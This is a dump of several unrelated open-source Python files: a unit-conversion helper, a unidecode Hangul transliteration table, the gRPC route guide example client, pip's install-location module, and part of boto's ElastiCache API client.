scaleFactor = getPixelsPerInch() / 72.0
cairoContext.scale( scaleFactor, scaleFactor )
@memoized
def strToPoints( unitsStr ):
"""
Converts from a string such as '2pt', '3in', '5pc', or '20px' into
a floating-point value measured in points.
Examples:
>>> setPixelsPerInch( 72 )
>>> strToPoints( '1in' )
72.0
>>> strToPoints( '1pt' )
1.0
>>> strToPoints( '5pc' )
60.0
>>> strToPoints( '72px' )
72.0
>>> strToPoints( '125em' )
Traceback (most recent call last):
...
ValueError: Bad measurement string: 125em
"""
units = float( unitsStr[:-2] )
if unitsStr.endswith( "pt" ):
return units
elif unitsStr.endswith( "in" ):
return inchesToPoints( units )
elif unitsStr.endswith( "pc" ):
return picasToPoints( units )
elif unitsStr.endswith( "px" ):
return pixelsToPoints( units )
else:
raise ValueError( "Bad measurement string: %s" % unitsStr )
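# Minimal sketch (an addition for illustration, not in the original module):
# running this file directly exercises the doctest examples embedded in
# strToPoints() above; it assumes only the standard-library doctest module.
if __name__ == "__main__":
    import doctest
    doctest.testmod()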
|
bsd-3-clause
|
ActionAdam/osmc
|
package/mediacenter-skin-osmc/files/usr/share/kodi/addons/script.module.unidecode/lib/unidecode/x011.py
|
252
|
4135
|
data = (
'g', # 0x00
'gg', # 0x01
'n', # 0x02
'd', # 0x03
'dd', # 0x04
'r', # 0x05
'm', # 0x06
'b', # 0x07
'bb', # 0x08
's', # 0x09
'ss', # 0x0a
'', # 0x0b
'j', # 0x0c
'jj', # 0x0d
'c', # 0x0e
'k', # 0x0f
't', # 0x10
'p', # 0x11
'h', # 0x12
'ng', # 0x13
'nn', # 0x14
'nd', # 0x15
'nb', # 0x16
'dg', # 0x17
'rn', # 0x18
'rr', # 0x19
'rh', # 0x1a
'rN', # 0x1b
'mb', # 0x1c
'mN', # 0x1d
'bg', # 0x1e
'bn', # 0x1f
'', # 0x20
'bs', # 0x21
'bsg', # 0x22
'bst', # 0x23
'bsb', # 0x24
'bss', # 0x25
'bsj', # 0x26
'bj', # 0x27
'bc', # 0x28
'bt', # 0x29
'bp', # 0x2a
'bN', # 0x2b
'bbN', # 0x2c
'sg', # 0x2d
'sn', # 0x2e
'sd', # 0x2f
'sr', # 0x30
'sm', # 0x31
'sb', # 0x32
'sbg', # 0x33
'sss', # 0x34
's', # 0x35
'sj', # 0x36
'sc', # 0x37
'sk', # 0x38
'st', # 0x39
'sp', # 0x3a
'sh', # 0x3b
'', # 0x3c
'', # 0x3d
'', # 0x3e
'', # 0x3f
'Z', # 0x40
'g', # 0x41
'd', # 0x42
'm', # 0x43
'b', # 0x44
's', # 0x45
'Z', # 0x46
'', # 0x47
'j', # 0x48
'c', # 0x49
't', # 0x4a
'p', # 0x4b
'N', # 0x4c
'j', # 0x4d
'', # 0x4e
'', # 0x4f
'', # 0x50
'', # 0x51
'ck', # 0x52
'ch', # 0x53
'', # 0x54
'', # 0x55
'pb', # 0x56
'pN', # 0x57
'hh', # 0x58
'Q', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'', # 0x5f
'', # 0x60
'a', # 0x61
'ae', # 0x62
'ya', # 0x63
'yae', # 0x64
'eo', # 0x65
'e', # 0x66
'yeo', # 0x67
'ye', # 0x68
'o', # 0x69
'wa', # 0x6a
'wae', # 0x6b
'oe', # 0x6c
'yo', # 0x6d
'u', # 0x6e
'weo', # 0x6f
'we', # 0x70
'wi', # 0x71
'yu', # 0x72
'eu', # 0x73
'yi', # 0x74
'i', # 0x75
'a-o', # 0x76
'a-u', # 0x77
'ya-o', # 0x78
'ya-yo', # 0x79
'eo-o', # 0x7a
'eo-u', # 0x7b
'eo-eu', # 0x7c
'yeo-o', # 0x7d
'yeo-u', # 0x7e
'o-eo', # 0x7f
'o-e', # 0x80
'o-ye', # 0x81
'o-o', # 0x82
'o-u', # 0x83
'yo-ya', # 0x84
'yo-yae', # 0x85
'yo-yeo', # 0x86
'yo-o', # 0x87
'yo-i', # 0x88
'u-a', # 0x89
'u-ae', # 0x8a
'u-eo-eu', # 0x8b
'u-ye', # 0x8c
'u-u', # 0x8d
'yu-a', # 0x8e
'yu-eo', # 0x8f
'yu-e', # 0x90
'yu-yeo', # 0x91
'yu-ye', # 0x92
'yu-u', # 0x93
'yu-i', # 0x94
'eu-u', # 0x95
'eu-eu', # 0x96
'yi-u', # 0x97
'i-a', # 0x98
'i-ya', # 0x99
'i-o', # 0x9a
'i-u', # 0x9b
'i-eu', # 0x9c
'i-U', # 0x9d
'U', # 0x9e
'U-eo', # 0x9f
'U-u', # 0xa0
'U-i', # 0xa1
'UU', # 0xa2
'[?]', # 0xa3
'[?]', # 0xa4
'[?]', # 0xa5
'[?]', # 0xa6
'[?]', # 0xa7
'g', # 0xa8
'gg', # 0xa9
'gs', # 0xaa
'n', # 0xab
'nj', # 0xac
'nh', # 0xad
'd', # 0xae
'l', # 0xaf
'lg', # 0xb0
'lm', # 0xb1
'lb', # 0xb2
'ls', # 0xb3
'lt', # 0xb4
'lp', # 0xb5
'lh', # 0xb6
'm', # 0xb7
'b', # 0xb8
'bs', # 0xb9
's', # 0xba
'ss', # 0xbb
'ng', # 0xbc
'j', # 0xbd
'c', # 0xbe
'k', # 0xbf
't', # 0xc0
'p', # 0xc1
'h', # 0xc2
'gl', # 0xc3
'gsg', # 0xc4
'ng', # 0xc5
'nd', # 0xc6
'ns', # 0xc7
'nZ', # 0xc8
'nt', # 0xc9
'dg', # 0xca
'tl', # 0xcb
'lgs', # 0xcc
'ln', # 0xcd
'ld', # 0xce
'lth', # 0xcf
'll', # 0xd0
'lmg', # 0xd1
'lms', # 0xd2
'lbs', # 0xd3
'lbh', # 0xd4
'rNp', # 0xd5
'lss', # 0xd6
'lZ', # 0xd7
'lk', # 0xd8
'lQ', # 0xd9
'mg', # 0xda
'ml', # 0xdb
'mb', # 0xdc
'ms', # 0xdd
'mss', # 0xde
'mZ', # 0xdf
'mc', # 0xe0
'mh', # 0xe1
'mN', # 0xe2
'bl', # 0xe3
'bp', # 0xe4
'ph', # 0xe5
'pN', # 0xe6
'sg', # 0xe7
'sd', # 0xe8
'sl', # 0xe9
'sb', # 0xea
'Z', # 0xeb
'g', # 0xec
'ss', # 0xed
'', # 0xee
'kh', # 0xef
'N', # 0xf0
'Ns', # 0xf1
'NZ', # 0xf2
'pb', # 0xf3
'pN', # 0xf4
'hn', # 0xf5
'hl', # 0xf6
'hm', # 0xf7
'hb', # 0xf8
'Q', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
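# Illustrative note (not part of the original table): entries are indexed by the
# low byte of the code point, so for this block (U+1100..U+11FF) the Hangul
# jungseong A (U+1161) resolves to data[0x61], i.e. 'a'. A hypothetical check
# through the package's public API:
#
#   from unidecode import unidecode
#   assert unidecode(u'\u1161') == 'a'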
|
gpl-2.0
|
royalharsh/grpc
|
examples/python/route_guide/route_guide_client.py
|
25
|
4682
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The Python implementation of the gRPC route guide client."""
from __future__ import print_function
import random
import time
import grpc
import route_guide_pb2
import route_guide_pb2_grpc
import route_guide_resources
def make_route_note(message, latitude, longitude):
return route_guide_pb2.RouteNote(
message=message,
location=route_guide_pb2.Point(latitude=latitude, longitude=longitude))
def guide_get_one_feature(stub, point):
feature = stub.GetFeature(point)
if not feature.location:
print("Server returned incomplete feature")
return
if feature.name:
print("Feature called %s at %s" % (feature.name, feature.location))
else:
print("Found no feature at %s" % feature.location)
def guide_get_feature(stub):
guide_get_one_feature(stub, route_guide_pb2.Point(latitude=409146138, longitude=-746188906))
guide_get_one_feature(stub, route_guide_pb2.Point(latitude=0, longitude=0))
def guide_list_features(stub):
rectangle = route_guide_pb2.Rectangle(
lo=route_guide_pb2.Point(latitude=400000000, longitude=-750000000),
hi=route_guide_pb2.Point(latitude=420000000, longitude=-730000000))
print("Looking for features between 40, -75 and 42, -73")
features = stub.ListFeatures(rectangle)
for feature in features:
print("Feature called %s at %s" % (feature.name, feature.location))
def generate_route(feature_list):
for _ in range(0, 10):
random_feature = feature_list[random.randint(0, len(feature_list) - 1)]
print("Visiting point %s" % random_feature.location)
yield random_feature.location
time.sleep(random.uniform(0.5, 1.5))
def guide_record_route(stub):
feature_list = route_guide_resources.read_route_guide_database()
route_iterator = generate_route(feature_list)
route_summary = stub.RecordRoute(route_iterator)
print("Finished trip with %s points " % route_summary.point_count)
print("Passed %s features " % route_summary.feature_count)
print("Travelled %s meters " % route_summary.distance)
print("It took %s seconds " % route_summary.elapsed_time)
def generate_messages():
messages = [
make_route_note("First message", 0, 0),
make_route_note("Second message", 0, 1),
make_route_note("Third message", 1, 0),
make_route_note("Fourth message", 0, 0),
make_route_note("Fifth message", 1, 0),
]
for msg in messages:
print("Sending %s at %s" % (msg.message, msg.location))
yield msg
time.sleep(random.uniform(0.5, 1.0))
def guide_route_chat(stub):
responses = stub.RouteChat(generate_messages())
for response in responses:
print("Received message %s at %s" % (response.message, response.location))
def run():
channel = grpc.insecure_channel('localhost:50051')
stub = route_guide_pb2_grpc.RouteGuideStub(channel)
print("-------------- GetFeature --------------")
guide_get_feature(stub)
print("-------------- ListFeatures --------------")
guide_list_features(stub)
print("-------------- RecordRoute --------------")
guide_record_route(stub)
print("-------------- RouteChat --------------")
guide_route_chat(stub)
if __name__ == '__main__':
run()
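# Note (illustrative addition): this client assumes a RouteGuide server is
# already listening on localhost:50051, for example the route_guide_server.py
# that accompanies this client in the gRPC Python examples.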
|
bsd-3-clause
|
classmember/proof_of_concept
|
python/events/lib/python3.4/site-packages/pip/_internal/locations.py
|
8
|
6307
|
"""Locations where we look for configs, install stuff, etc"""
from __future__ import absolute_import
import os
import os.path
import platform
import site
import sys
import sysconfig
from distutils import sysconfig as distutils_sysconfig
from distutils.command.install import SCHEME_KEYS # type: ignore
from pip._internal.utils import appdirs
from pip._internal.utils.compat import WINDOWS, expanduser
# Application Directories
USER_CACHE_DIR = appdirs.user_cache_dir("pip")
DELETE_MARKER_MESSAGE = '''\
This file is placed here by pip to indicate the source was put
here by pip.
Once this package is successfully installed this source code will be
deleted (unless you remove this file).
'''
PIP_DELETE_MARKER_FILENAME = 'pip-delete-this-directory.txt'
def write_delete_marker_file(directory):
"""
Write the pip delete marker file into this directory.
"""
filepath = os.path.join(directory, PIP_DELETE_MARKER_FILENAME)
with open(filepath, 'w') as marker_fp:
marker_fp.write(DELETE_MARKER_MESSAGE)
def running_under_virtualenv():
"""
Return True if we're running inside a virtualenv, False otherwise.
"""
if hasattr(sys, 'real_prefix'):
return True
elif sys.prefix != getattr(sys, "base_prefix", sys.prefix):
return True
return False
def virtualenv_no_global():
"""
Return True if in a venv and no system site packages.
"""
# this mirrors the logic in virtualenv.py for locating the
# no-global-site-packages.txt file
site_mod_dir = os.path.dirname(os.path.abspath(site.__file__))
no_global_file = os.path.join(site_mod_dir, 'no-global-site-packages.txt')
if running_under_virtualenv() and os.path.isfile(no_global_file):
return True
if running_under_virtualenv():
src_prefix = os.path.join(sys.prefix, 'src')
else:
# FIXME: keep src in cwd for now (it is not a temporary folder)
try:
src_prefix = os.path.join(os.getcwd(), 'src')
except OSError:
# In case the current working directory has been renamed or deleted
sys.exit(
"The folder you are executing pip from can no longer be found."
)
# under macOS + virtualenv sys.prefix is not properly resolved
# it is something like /path/to/python/bin/..
# Note: using realpath due to tmp dirs on OSX being symlinks
src_prefix = os.path.abspath(src_prefix)
# FIXME doesn't account for venv linked to global site-packages
site_packages = sysconfig.get_path("purelib")
# This is because of a bug in PyPy's sysconfig module, see
# https://bitbucket.org/pypy/pypy/issues/2506/sysconfig-returns-incorrect-paths
# for more information.
if platform.python_implementation().lower() == "pypy":
site_packages = distutils_sysconfig.get_python_lib()
try:
# Use getusersitepackages if this is present, as it ensures that the
# value is initialised properly.
user_site = site.getusersitepackages()
except AttributeError:
user_site = site.USER_SITE
user_dir = expanduser('~')
if WINDOWS:
bin_py = os.path.join(sys.prefix, 'Scripts')
bin_user = os.path.join(user_site, 'Scripts')
# buildout uses 'bin' on Windows too?
if not os.path.exists(bin_py):
bin_py = os.path.join(sys.prefix, 'bin')
bin_user = os.path.join(user_site, 'bin')
config_basename = 'pip.ini'
legacy_storage_dir = os.path.join(user_dir, 'pip')
legacy_config_file = os.path.join(
legacy_storage_dir,
config_basename,
)
else:
bin_py = os.path.join(sys.prefix, 'bin')
bin_user = os.path.join(user_site, 'bin')
config_basename = 'pip.conf'
legacy_storage_dir = os.path.join(user_dir, '.pip')
legacy_config_file = os.path.join(
legacy_storage_dir,
config_basename,
)
# Forcing to use /usr/local/bin for standard macOS framework installs
# Also log to ~/Library/Logs/ for use with the Console.app log viewer
if sys.platform[:6] == 'darwin' and sys.prefix[:16] == '/System/Library/':
bin_py = '/usr/local/bin'
site_config_files = [
os.path.join(path, config_basename)
for path in appdirs.site_config_dirs('pip')
]
venv_config_file = os.path.join(sys.prefix, config_basename)
new_config_file = os.path.join(appdirs.user_config_dir("pip"), config_basename)
def distutils_scheme(dist_name, user=False, home=None, root=None,
isolated=False, prefix=None):
"""
Return a distutils install scheme
"""
from distutils.dist import Distribution
scheme = {}
if isolated:
extra_dist_args = {"script_args": ["--no-user-cfg"]}
else:
extra_dist_args = {}
dist_args = {'name': dist_name}
dist_args.update(extra_dist_args)
d = Distribution(dist_args)
d.parse_config_files()
i = d.get_command_obj('install', create=True)
# NOTE: setting user or home has the side-effect of creating the home dir
# or user base for installations during finalize_options()
# ideally, we'd prefer a scheme class that has no side-effects.
assert not (user and prefix), "user={} prefix={}".format(user, prefix)
i.user = user or i.user
if user:
i.prefix = ""
i.prefix = prefix or i.prefix
i.home = home or i.home
i.root = root or i.root
i.finalize_options()
for key in SCHEME_KEYS:
scheme[key] = getattr(i, 'install_' + key)
# install_lib specified in setup.cfg should install *everything*
# into there (i.e. it takes precedence over both purelib and
# platlib). Note, i.install_lib is *always* set after
# finalize_options(); we only want to override here if the user
# has explicitly requested it hence going back to the config
if 'install_lib' in d.get_option_dict('install'):
scheme.update(dict(purelib=i.install_lib, platlib=i.install_lib))
if running_under_virtualenv():
scheme['headers'] = os.path.join(
sys.prefix,
'include',
'site',
'python' + sys.version[:3],
dist_name,
)
if root is not None:
path_no_drive = os.path.splitdrive(
os.path.abspath(scheme["headers"]))[1]
scheme["headers"] = os.path.join(
root,
path_no_drive[1:],
)
return scheme
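# Illustrative usage sketch (not part of the original module): the returned
# scheme is a plain dict keyed by distutils' SCHEME_KEYS, e.g.
#
#   scheme = distutils_scheme('example-dist')
#   # scheme['purelib'], scheme['platlib'], scheme['headers'], scheme['scripts']
#   # and scheme['data'] now hold the paths pip would use for a default install.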
|
mit
|
Workday/OpenFrame
|
tools/telemetry/third_party/gsutilz/third_party/boto/boto/elasticache/layer1.py
|
150
|
73538
|
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
from boto.compat import json
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
class ElastiCacheConnection(AWSQueryConnection):
"""
Amazon ElastiCache
Amazon ElastiCache is a web service that makes it easier to set
up, operate, and scale a distributed cache in the cloud.
With ElastiCache, customers gain all of the benefits of a high-
performance, in-memory cache with far less of the administrative
burden of launching and managing a distributed cache. The service
makes set-up, scaling, and cluster failure handling much simpler
than in a self-managed cache deployment.
In addition, through integration with Amazon CloudWatch, customers
get enhanced visibility into the key performance statistics
associated with their cache and can receive alarms if a part of
their cache runs hot.
"""
APIVersion = "2013-06-15"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "elasticache.us-east-1.amazonaws.com"
def __init__(self, **kwargs):
region = kwargs.get('region')
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
else:
del kwargs['region']
kwargs['host'] = region.endpoint
super(ElastiCacheConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def authorize_cache_security_group_ingress(self,
cache_security_group_name,
ec2_security_group_name,
ec2_security_group_owner_id):
"""
The AuthorizeCacheSecurityGroupIngress operation allows
network ingress to a cache security group. Applications using
ElastiCache must be running on Amazon EC2, and Amazon EC2
security groups are used as the authorization mechanism.
You cannot authorize ingress from an Amazon EC2 security group
in one Region to an ElastiCache cluster in another Region.
:type cache_security_group_name: string
:param cache_security_group_name: The cache security group which will
allow network ingress.
:type ec2_security_group_name: string
:param ec2_security_group_name: The Amazon EC2 security group to be
authorized for ingress to the cache security group.
:type ec2_security_group_owner_id: string
:param ec2_security_group_owner_id: The AWS account number of the
Amazon EC2 security group owner. Note that this is not the same
thing as an AWS access key ID - you must provide a valid AWS
account number for this parameter.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
'EC2SecurityGroupName': ec2_security_group_name,
'EC2SecurityGroupOwnerId': ec2_security_group_owner_id,
}
return self._make_request(
action='AuthorizeCacheSecurityGroupIngress',
verb='POST',
path='/', params=params)
def create_cache_cluster(self, cache_cluster_id, num_cache_nodes=None,
cache_node_type=None, engine=None,
replication_group_id=None, engine_version=None,
cache_parameter_group_name=None,
cache_subnet_group_name=None,
cache_security_group_names=None,
security_group_ids=None, snapshot_arns=None,
preferred_availability_zone=None,
preferred_maintenance_window=None, port=None,
notification_topic_arn=None,
auto_minor_version_upgrade=None):
"""
The CreateCacheCluster operation creates a new cache cluster.
All nodes in the cache cluster run the same protocol-compliant
cache engine software - either Memcached or Redis.
:type cache_cluster_id: string
:param cache_cluster_id:
The cache cluster identifier. This parameter is stored as a lowercase
string.
Constraints:
+ Must contain from 1 to 20 alphanumeric characters or hyphens.
+ First character must be a letter.
+ Cannot end with a hyphen or contain two consecutive hyphens.
:type replication_group_id: string
:param replication_group_id: The replication group to which this cache
cluster should belong. If this parameter is specified, the cache
cluster will be added to the specified replication group as a read
replica; otherwise, the cache cluster will be a standalone primary
that is not part of any replication group.
:type num_cache_nodes: integer
:param num_cache_nodes: The initial number of cache nodes that the
cache cluster will have.
For a Memcached cluster, valid values are between 1 and 20. If you need
to exceed this limit, please fill out the ElastiCache Limit
Increase Request form at ``_ .
For Redis, only single-node cache clusters are supported at this time,
so the value for this parameter must be 1.
:type cache_node_type: string
:param cache_node_type: The compute and memory capacity of the nodes in
the cache cluster.
Valid values for Memcached:
`cache.t1.micro` | `cache.m1.small` | `cache.m1.medium` |
`cache.m1.large` | `cache.m1.xlarge` | `cache.m3.xlarge` |
`cache.m3.2xlarge` | `cache.m2.xlarge` | `cache.m2.2xlarge` |
`cache.m2.4xlarge` | `cache.c1.xlarge`
Valid values for Redis:
`cache.t1.micro` | `cache.m1.small` | `cache.m1.medium` |
`cache.m1.large` | `cache.m1.xlarge` | `cache.m2.xlarge` |
`cache.m2.2xlarge` | `cache.m2.4xlarge` | `cache.c1.xlarge`
For a complete listing of cache node types and specifications, see `.
:type engine: string
:param engine: The name of the cache engine to be used for this cache
cluster.
Valid values for this parameter are:
`memcached` | `redis`
:type engine_version: string
:param engine_version: The version number of the cache engine to be
used for this cluster. To view the supported cache engine versions,
use the DescribeCacheEngineVersions operation.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to associate with this cache cluster. If this argument is
omitted, the default cache parameter group for the specified engine
will be used.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name of the cache subnet group to
be used for the cache cluster.
Use this parameter only when you are creating a cluster in an Amazon
Virtual Private Cloud (VPC).
:type cache_security_group_names: list
:param cache_security_group_names: A list of cache security group names
to associate with this cache cluster.
Use this parameter only when you are creating a cluster outside of an
Amazon Virtual Private Cloud (VPC).
:type security_group_ids: list
:param security_group_ids: One or more VPC security groups associated
with the cache cluster.
Use this parameter only when you are creating a cluster in an Amazon
Virtual Private Cloud (VPC).
:type snapshot_arns: list
:param snapshot_arns: A single-element string list containing an Amazon
Resource Name (ARN) that uniquely identifies a Redis RDB snapshot
file stored in Amazon S3. The snapshot file will be used to
populate the Redis cache in the new cache cluster. The Amazon S3
object name in the ARN cannot contain any commas.
Here is an example of an Amazon S3 ARN:
`arn:aws:s3:::my_bucket/snapshot1.rdb`
**Note:** This parameter is only valid if the `Engine` parameter is
`redis`.
:type preferred_availability_zone: string
:param preferred_availability_zone: The EC2 Availability Zone in which
the cache cluster will be created.
All cache nodes belonging to a cache cluster are placed in the
preferred availability zone.
Default: System chosen availability zone.
:type preferred_maintenance_window: string
:param preferred_maintenance_window: The weekly time range (in UTC)
during which system maintenance can occur.
Example: `sun:05:00-sun:09:00`
:type port: integer
:param port: The port number on which each of the cache nodes will
accept connections.
:type notification_topic_arn: string
:param notification_topic_arn:
The Amazon Resource Name (ARN) of the Amazon Simple Notification
Service (SNS) topic to which notifications will be sent.
The Amazon SNS topic owner must be the same as the cache cluster owner.
:type auto_minor_version_upgrade: boolean
:param auto_minor_version_upgrade: Determines whether minor engine
upgrades will be applied automatically to the cache cluster during
the maintenance window. A value of `True` allows these upgrades to
occur; `False` disables automatic upgrades.
Default: `True`
"""
params = {
'CacheClusterId': cache_cluster_id,
}
if num_cache_nodes is not None:
params['NumCacheNodes'] = num_cache_nodes
if cache_node_type is not None:
params['CacheNodeType'] = cache_node_type
if engine is not None:
params['Engine'] = engine
if replication_group_id is not None:
params['ReplicationGroupId'] = replication_group_id
if engine_version is not None:
params['EngineVersion'] = engine_version
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if cache_subnet_group_name is not None:
params['CacheSubnetGroupName'] = cache_subnet_group_name
if cache_security_group_names is not None:
self.build_list_params(params,
cache_security_group_names,
'CacheSecurityGroupNames.member')
if security_group_ids is not None:
self.build_list_params(params,
security_group_ids,
'SecurityGroupIds.member')
if snapshot_arns is not None:
self.build_list_params(params,
snapshot_arns,
'SnapshotArns.member')
if preferred_availability_zone is not None:
params['PreferredAvailabilityZone'] = preferred_availability_zone
if preferred_maintenance_window is not None:
params['PreferredMaintenanceWindow'] = preferred_maintenance_window
if port is not None:
params['Port'] = port
if notification_topic_arn is not None:
params['NotificationTopicArn'] = notification_topic_arn
if auto_minor_version_upgrade is not None:
params['AutoMinorVersionUpgrade'] = str(
auto_minor_version_upgrade).lower()
return self._make_request(
action='CreateCacheCluster',
verb='POST',
path='/', params=params)
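    # Illustrative usage sketch (not part of the original module): creating a
    # single-node Memcached cluster, assuming AWS credentials are available to
    # boto through its usual configuration mechanisms.
    #
    #   conn = ElastiCacheConnection()
    #   conn.create_cache_cluster('mycluster',
    #                             num_cache_nodes=1,
    #                             cache_node_type='cache.m1.small',
    #                             engine='memcached')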
def create_cache_parameter_group(self, cache_parameter_group_name,
cache_parameter_group_family,
description):
"""
The CreateCacheParameterGroup operation creates a new cache
parameter group. A cache parameter group is a collection of
parameters that you apply to all of the nodes in a cache
cluster.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: A user-specified name for the cache
parameter group.
:type cache_parameter_group_family: string
:param cache_parameter_group_family: The name of the cache parameter
group family the cache parameter group can be used with.
Valid values are: `memcached1.4` | `redis2.6`
:type description: string
:param description: A user-specified description for the cache
parameter group.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
'CacheParameterGroupFamily': cache_parameter_group_family,
'Description': description,
}
return self._make_request(
action='CreateCacheParameterGroup',
verb='POST',
path='/', params=params)
def create_cache_security_group(self, cache_security_group_name,
description):
"""
The CreateCacheSecurityGroup operation creates a new cache
security group. Use a cache security group to control access
to one or more cache clusters.
Cache security groups are only used when you are creating a
cluster outside of an Amazon Virtual Private Cloud (VPC). If
you are creating a cluster inside of a VPC, use a cache subnet
group instead. For more information, see
CreateCacheSubnetGroup .
:type cache_security_group_name: string
:param cache_security_group_name: A name for the cache security group.
This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters.
Must not be the word "Default".
Example: `mysecuritygroup`
:type description: string
:param description: A description for the cache security group.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
'Description': description,
}
return self._make_request(
action='CreateCacheSecurityGroup',
verb='POST',
path='/', params=params)
def create_cache_subnet_group(self, cache_subnet_group_name,
cache_subnet_group_description, subnet_ids):
"""
The CreateCacheSubnetGroup operation creates a new cache
subnet group.
Use this parameter only when you are creating a cluster in an
Amazon Virtual Private Cloud (VPC).
:type cache_subnet_group_name: string
:param cache_subnet_group_name: A name for the cache subnet group. This
value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters or
hyphens.
Example: `mysubnetgroup`
:type cache_subnet_group_description: string
:param cache_subnet_group_description: A description for the cache
subnet group.
:type subnet_ids: list
:param subnet_ids: A list of VPC subnet IDs for the cache subnet group.
"""
params = {
'CacheSubnetGroupName': cache_subnet_group_name,
'CacheSubnetGroupDescription': cache_subnet_group_description,
}
self.build_list_params(params,
subnet_ids,
'SubnetIds.member')
return self._make_request(
action='CreateCacheSubnetGroup',
verb='POST',
path='/', params=params)
def create_replication_group(self, replication_group_id,
primary_cluster_id,
replication_group_description):
"""
The CreateReplicationGroup operation creates a replication
group. A replication group is a collection of cache clusters,
where one of the clusters is a read/write primary and the
other clusters are read-only replicas. Writes to the primary
are automatically propagated to the replicas.
When you create a replication group, you must specify an
existing cache cluster that is in the primary role. When the
replication group has been successfully created, you can add
        one or more read replicas to it, up to a total of five
read replicas.
:type replication_group_id: string
:param replication_group_id:
The replication group identifier. This parameter is stored as a
lowercase string.
Constraints:
+ Must contain from 1 to 20 alphanumeric characters or hyphens.
+ First character must be a letter.
+ Cannot end with a hyphen or contain two consecutive hyphens.
:type primary_cluster_id: string
:param primary_cluster_id: The identifier of the cache cluster that
will serve as the primary for this replication group. This cache
cluster must already exist and have a status of available .
:type replication_group_description: string
:param replication_group_description: A user-specified description for
the replication group.
"""
params = {
'ReplicationGroupId': replication_group_id,
'PrimaryClusterId': primary_cluster_id,
'ReplicationGroupDescription': replication_group_description,
}
return self._make_request(
action='CreateReplicationGroup',
verb='POST',
path='/', params=params)
def delete_cache_cluster(self, cache_cluster_id):
"""
The DeleteCacheCluster operation deletes a previously
provisioned cache cluster. DeleteCacheCluster deletes all
associated cache nodes, node endpoints and the cache cluster
itself. When you receive a successful response from this
operation, Amazon ElastiCache immediately begins deleting the
cache cluster; you cannot cancel or revert this operation.
:type cache_cluster_id: string
:param cache_cluster_id: The cache cluster identifier for the cluster
to be deleted. This parameter is not case sensitive.
"""
params = {'CacheClusterId': cache_cluster_id, }
return self._make_request(
action='DeleteCacheCluster',
verb='POST',
path='/', params=params)
def delete_cache_parameter_group(self, cache_parameter_group_name):
"""
The DeleteCacheParameterGroup operation deletes the specified
cache parameter group. You cannot delete a cache parameter
group if it is associated with any cache clusters.
:type cache_parameter_group_name: string
:param cache_parameter_group_name:
The name of the cache parameter group to delete.
The specified cache security group must not be associated with any
cache clusters.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
return self._make_request(
action='DeleteCacheParameterGroup',
verb='POST',
path='/', params=params)
def delete_cache_security_group(self, cache_security_group_name):
"""
The DeleteCacheSecurityGroup operation deletes a cache
security group.
You cannot delete a cache security group if it is associated
with any cache clusters.
:type cache_security_group_name: string
:param cache_security_group_name:
The name of the cache security group to delete.
You cannot delete the default security group.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
}
return self._make_request(
